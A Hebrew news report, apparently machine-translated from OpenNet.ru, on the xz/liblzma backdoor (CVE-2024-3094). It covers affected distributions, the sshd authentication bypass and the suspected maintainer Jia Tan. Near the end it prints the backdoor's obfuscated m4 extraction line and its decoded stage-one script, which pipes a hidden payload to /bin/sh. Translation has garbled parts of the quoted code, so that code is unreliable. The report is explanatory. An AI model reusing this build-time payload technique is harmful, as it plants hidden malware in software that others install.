דלת אחורית התגלתה בספריית xz/liblzma המאפשרת כניסה באמצעות sshd

בחבילת XZ Utils, הכוללת את ספריית liblzma וכלי עזר לעבודה עם נתונים דחוסים בפורמט ".xz", זוהתה דלת אחורית (CVE-2024-3094) המאפשרת יירוט ושינוי של נתונים המעובדים על ידי אפליקציות הקשורות עם ספריית ליבלזמה. המטרה העיקרית של הדלת האחורית היא שרת OpenSSH, אשר בהפצות מסוימות מצורף עם ספריית libsystemd, אשר בתורה משתמשת ב-liblzma. קישור sshd עם ספרייה פגיעה מאפשר לתוקפים לקבל גישה לשרת SSH ללא אימות.

הדלת האחורית הייתה קיימת במהדורות הרשמיות 5.6.0 ו-5.6.1, שפורסמו ב-24 בפברואר וב-9 במרץ, שהצליחו להיכנס לכמה הפצות ומאגרים, למשל, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide ו- 40 בטא, openSUSE מפעל ו-tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva רולינג, זרם pkgsrc, זרם Slackware, בדיקות Manjaro. מומלץ לכל המשתמשים במהדורות xz 5.6.0 ו-5.6.1 לחזור בדחיפות לגרסה 5.4.6.

בין הגורמים המקלים על הבעיה, ניתן לציין כי הגרסה של liblzma עם דלת אחורית לא הצליחה להפוך לחלק מהגרסאות היציבות של הפצות גדולות, אלא השפיעה על openSUSE Tumbleweed ו-Fedora 40-beta. Arch Linux וג'נטו השתמשו בגרסה פגיעה של zx, אך אינן רגישות למתקפה כי הן אינן מחילות את התיקון systemd-notify ל-openssh, מה שגורם ל-sshd להיות מקושר ל-liblzma. הדלת האחורית משפיעה רק על מערכות x86_64 המבוססות על ליבת לינוקס וספריית Glibc C.

קוד ההפעלה של הדלת האחורית הוסתר בפקודות מאקרו m4 מהקובץ build-to-host.m4 המשמש את ערכת הכלים של automake בעת הבנייה. במהלך ההרכבה, במהלך ביצוע פעולות מסובכות ומעורפלות המבוססות על ארכיונים (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), ששימשו לבדיקת נכונות הפעולה, נוצר קובץ אובייקט עם קוד זדוני, שנכלל ב- ספריית liblzma ושינתה את היגיון הפעולה של חלק מהפונקציות שלה. פקודות המאקרו m4 שמפעילות את הדלת האחורית נכללו ב-tarballs לשחרור, אך לא היו במאגר Git. במקביל, נכחו במאגר ארכיוני בדיקות זדוניים, כלומר. לאדם שהטמיע את הדלת האחורית הייתה גישה הן למאגר והן לתהליכי יצירת השחרור.

בעת שימוש ב-liblzma ביישומים, שינויים זדוניים עשויים לשמש כדי ליירט או לשנות נתונים, או להשפיע על פעולת sshd. בפרט, הקוד הזדוני זייף את הפונקציה RSA_public_decrypt כדי לעקוף את תהליך האימות sshd. הדלת האחורית כללה הגנה מפני זיהוי ולא באה לידי ביטוי כאשר הוגדרו משתני הסביבה LANG ו-TERM (כלומר, בעת הפעלת התהליך בטרמינל) ומשתני הסביבה LD_DEBUG ו-LD_PROFILE לא הוגדרו, וכן הופעל רק בעת ביצוע ה- קובץ ההפעלה /usr/sbin/sshd . לדלת האחורית היה גם אמצעי לזיהוי ביצוע בסביבות ניפוי באגים.

במיוחד, הקובץ m4/build-to-host.m4 השתמש ב-gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev / null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

בבנייה הראשונה, פעולת grep מצאה את הקובץ tests/files/bad-3-corrupt_lzma2.xz, אשר לאחר פריקת החבילה יצר את הסקריפט: ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux" ] && יציאה 0 [ ! $(uname) = "Linux" ] && יציאה 0 [ ! $(uname) = "Linux" ] && יציאה 0 [ ! $(uname) = "Linux" ] && יציאה 0 [ ! $(uname) = "Linux" ] && יציאה 0 eval `grep ^srcdir= config.status` אם test -f ../../config.status;ואז eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdir» fi export i=»((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head - c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head - c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/ dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ( head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F raw —lzma1 -dc|/bin/sh ####World####

כיצד הצליחו התוקפים להשיג גישה לתשתית של פרויקט xz עדיין לא הובהר במלואו. כמו כן, עדיין לא ברור כמה משתמשים ופרויקטים נפגעו כתוצאה מהדלת האחורית. המחבר לכאורה של הדלת האחורית (JiaT75 - Jia Tan), שפרסם ארכיונים עם קוד זדוני במאגר, התכתב עם מפתחי פדורה ושלח בקשות משיכה לדביאן הקשורות למעבר ההפצות לסניף xz 5.6.0, ולא עשה זאת. לעורר חשד, מאז שהשתתף ב-xz מפתח בשנתיים האחרונות והוא המפתח השני מבחינת מספר השינויים שבוצעו. בנוסף לפרויקט xz, המחבר לכאורה של הדלת האחורית השתתף גם בפיתוח החבילות xz-java ו-xz-embedded. יתרה מכך, Jia Tan לפני מספר ימים נכלל במספר המתחזקים של פרויקט XZ Embedded בשימוש בליבת לינוקס.

השינוי הזדוני התגלה לאחר ניתוח צריכת מעבד מוגזמת ושגיאות שנוצרו על ידי valgrind בעת חיבור באמצעות ssh למערכות מבוססות Debian side. ראוי לציין שהמהדורה של xz 5.6.1 כללה שינויים שהוכנו על ידי המחבר לכאורה של הדלת האחורית בתגובה לתלונות על האטות sshd ותריסות שהתעוררו לאחר שדרוג לגרסת zx 5.6.0 עם הדלת האחורית. בנוסף, בשנה שעברה ביצעה Jia Tan שינויים שאינם תואמים את מצב הבדיקה "-fsanitize=address", מה שגרם להשבתה במהלך בדיקות ה-fuzz.

מקור: OpenNet.ru